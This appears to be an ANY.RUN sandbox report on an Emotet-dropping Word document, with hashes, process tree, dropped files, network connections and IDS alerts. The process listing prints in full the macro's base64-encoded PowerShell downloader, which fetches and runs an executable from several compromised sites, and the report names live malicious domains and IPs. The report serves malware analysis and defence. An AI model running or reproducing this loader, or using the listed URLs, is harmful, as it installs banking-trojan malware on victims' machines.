analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Fa_Num_UWP358555.doc

Full analysis: https://app.any.run/tasks/a581050b-29d6-4ba4-b9b5-e19030d08c76
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: March 21, 2019, 18:02:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
loader
emotet
emotet-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Mar 21 15:17:00 2019, Last Saved Time/Date: Thu Mar 21 15:17:00 2019, Number of Pages: 1, Number of Words: 1, Number of Characters: 6, Security: 0
MD5:

BF2DEBDDB584D703E48AE75BFC76070C

SHA1:

B8C777E67CB356E31658DC6BD90938C14D0FDAB3

SHA256:

C97349AF82239EE4B7567769BA43A6C1A3B79E6D50E563933C140FA92536FA43

SSDEEP:

3072:u77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8q+AGphPJ54haq:u77HUUUUUUUUUUUUUUUUUUUT52VLAGH4

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Downloads executable files from the Internet

      • powershell.exe (PID: 2272)
    • Application was dropped or rewritten from another process

      • 583.exe (PID: 3188)
      • 583.exe (PID: 2560)
      • wabmetagen.exe (PID: 816)
      • wabmetagen.exe (PID: 2044)
    • Emotet process was detected

      • wabmetagen.exe (PID: 816)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2272)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2272)
      • 583.exe (PID: 2560)
    • Application launched itself

      • 583.exe (PID: 3188)
      • wabmetagen.exe (PID: 816)
    • Starts itself from another location

      • 583.exe (PID: 2560)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1660)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 1660)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:03:21 15:17:00
ModifyDate: 2019:03:21 15:17:00
Pages: 1
Words: 1
Characters: 6
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 6
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 583.exe no specs 583.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1660"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Fa_Num_UWP358555.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2272powershell -e JABLAHcAdwBBAEEAMQA0AEcAPQAoACcASQBCACcAKwAnAEIAVQBBAEEAMQAxACcAKQA7ACQAWABvAFUAUQBBAFEAYwA9AC4AKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQAnACsAJwBjAHQAJwApACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAQQBYAFUAWABCAEEAPQAoACcAaAB0AHQAcAA6ACcAKwAnAC8ALwBhAHYAbwBjACcAKwAnAGEAdABzAC0AZQB0ACcAKwAnAHIAYQBuAGcAZQByAHMALgBjAG8AJwArACcAbQAvAHcAcAAtACcAKwAnAGEAJwArACcAZAAnACsAJwBtAGkAbgAnACsAJwAvADAAcwBtAC8AQABoAHQAdAAnACsAJwBwADoALwAvAGEAcgB0AGUAJwArACcAYwBhAHUAdAAnACsAJwBvAG0AYQB0ACcAKwAnAGUAbgAnACsAJwAuACcAKwAnAGMAbwBtACcAKwAnAC8AdwBwAC0AYwBvAG4AdAAnACsAJwBlACcAKwAnAG4AdAAvACcAKwAnADIAJwArACcANwA1AFcAdwBhAC8AQABoACcAKwAnAHQAdABwACcAKwAnADoALwAvAHQAaQB0ACcAKwAnAGEAbgAnACsAJwBpAHUAbQB0AHYALgBjAGwAdQBiAC8AdwBwAC0AYwBvAG4AdABlACcAKwAnAG4AdAAvAEEAMwAxAGsAOQBPACcAKwAnAC8AQABoAHQAdABwADoAJwArACcALwAvAGUAeQAnACsAJwBuAG8AJwArACcAcgBkAGkAYwAuAGMAbwAnACsAJwBtAC8AYwAnACsAJwBnAGkALQBiACcAKwAnAGkAbgAvAEwAJwArACcAagAvAEAAaAB0ACcAKwAnAHQAcAA6ACcAKwAnAC8AJwArACcALwB0AGUAcwAnACsAJwB0AC4AbwAnACsAJwByAGQAJwArACcALgAnACsAJwBuAHUAJwArACcAdQBjAGwAJwArACcAbwB1AGQALgBjAG8AbQAvAGEAdwBzAHQAYQB0AHMAJwArACcALQBpAGMAbwAnACsAJwBuAC8AcwAnACsAJwBYACcAKwAnAEEAJwArACcAUAB5AC8AJwApAC4AKAAnAFMAJwArACcAcABsAGkAdAAnACkALgBJAG4AdgBvAGsAZQAoACcAQAAnACkAOwAkAEsAQQA0AHgAQQBDAFUAPQAoACcAWQA0AF8AJwArACcAdwBCAEEAJwApADsAJAB3AEEAQQBVAEEAMQB4ACAAPQAgACgAJwA1ACcAKwAnADgAMwAnACkAOwAkAG4AUQB3AEEANABjAD0AKAAnAFUAQQBEACcAKwAnAEEAJwArACcAQQBjAEEAYwAnACkAOwAkAEkAWgBHAEIAQgBBAEEAQQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQAdwBBAEEAVQBBADEAeAArACgAJwAuACcAKwAnAGUAeABlACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGEAWABvAFoANABBACAAaQBuACAAJABBAFgAVQBYAEIAQQApAHsAdAByAHkAewAkAFgAbwBVAFEAQQBRAGMALgAoACcARABvACcAKwAnAHcAbgBsAG8AYQBkAEYAaQBsACcAKwAnAGUAJwApAC4ASQBuAHYAbwBrAGUAKAAkAGEAWABvAFoANABBACwAIAAkAEkAWgBHAEIAQgBBAEEAQQApADsAJABmAHcARABjADQAWAA9ACgAJwBNAFUAJwArACcANABjADQAQQAnACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQBJACcAKwAnAHQAZQAnACsAJwBtACcAKQAgACQASQBaAEcAQgBCAEEAQQBBACkALgAiAGwAZQBgAE4ARwBgAFQASAAiACAALQBnAGUAIAA0ADAAMAAwADAAKQAgAHsALgAoACcASQBuAHYAbwAnACsAJwBrAGUALQAnACsAJwBJAHQAZQAnACsAJwBtACcAKQAgACQASQBaAEcAQgBCAEEAQQBBADsAJABiAHcAQQBBAEEAQQA9ACgAJwBjAFEAQQBEAHgAJwArACcANABYACcAKQA7AGIAcgBlAGEAawA7AH0AfQBjAGEAdABjAGgAewB9AH0AJABoAGMAVQBrAFEAQwA9ACgAJwBjACcAKwAnAEEAMQBrAFUAQQBBACcAKQA7AA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3188"C:\Users\admin\583.exe" C:\Users\admin\583.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2560--5568bf2eC:\Users\admin\583.exe
583.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
816"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
583.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Exit code:
0
Version:
8,6,0,1000
2044--9bc43e78C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exewabmetagen.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Windows 8 Toast Notification
Version:
8,6,0,1000
Total events
1 668
Read events
1 200
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
1660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR8AF1.tmp.cvr
MD5:
SHA256:
2272powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\A6Y7QR4YNFKLUZHFEGWQ.temp
MD5:
SHA256:
1660WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:B6B72C48CD7441C6852266FF0266FE52
SHA256:EF7A49DC49FB189B3FDBAD1235CDB424804470E29CA64D5C9A751C0D539F47BC
2560583.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:4189987AF6370A45364D46C23F663FF0
SHA256:3CFC9F02EC2B1ABC63D826CE37CE964E7361D3E1E9E855D16A7B534E41CCAB7B
2272powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf983f.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$_Num_UWP358555.docpgc
MD5:BF240D6D0C714AE3B9517418C1BF5D6F
SHA256:B1FF76435FC076C023BDDE43443D99449DA30C1307D3956A2FE0AB2CA44BA102
1660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:54E60978863AED35BF574457C4C07119
SHA256:8EB29FBDD6B6295B68DBC5BC86AC3A01270810575170CB183ED1C9F73674E730
2272powershell.exeC:\Users\admin\583.exeexecutable
MD5:4189987AF6370A45364D46C23F663FF0
SHA256:3CFC9F02EC2B1ABC63D826CE37CE964E7361D3E1E9E855D16A7B534E41CCAB7B
2272powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
2
DNS requests
4
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2272
powershell.exe
GET
200
37.9.175.11:80
http://artecautomaten.com/wp-content/275Wwa/
SK
executable
171 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2272
powershell.exe
163.172.199.28:80
avocats-etrangers.com
Online S.a.s.
FR
suspicious
2272
powershell.exe
37.9.175.11:80
artecautomaten.com
Websupport s.r.o.
SK
suspicious

DNS requests

Domain
IP
Reputation
avocats-etrangers.com
  • 163.172.199.28
suspicious
artecautomaten.com
  • 37.9.175.11
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

PID
Process
Class
Message
2272
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2272
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2272
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info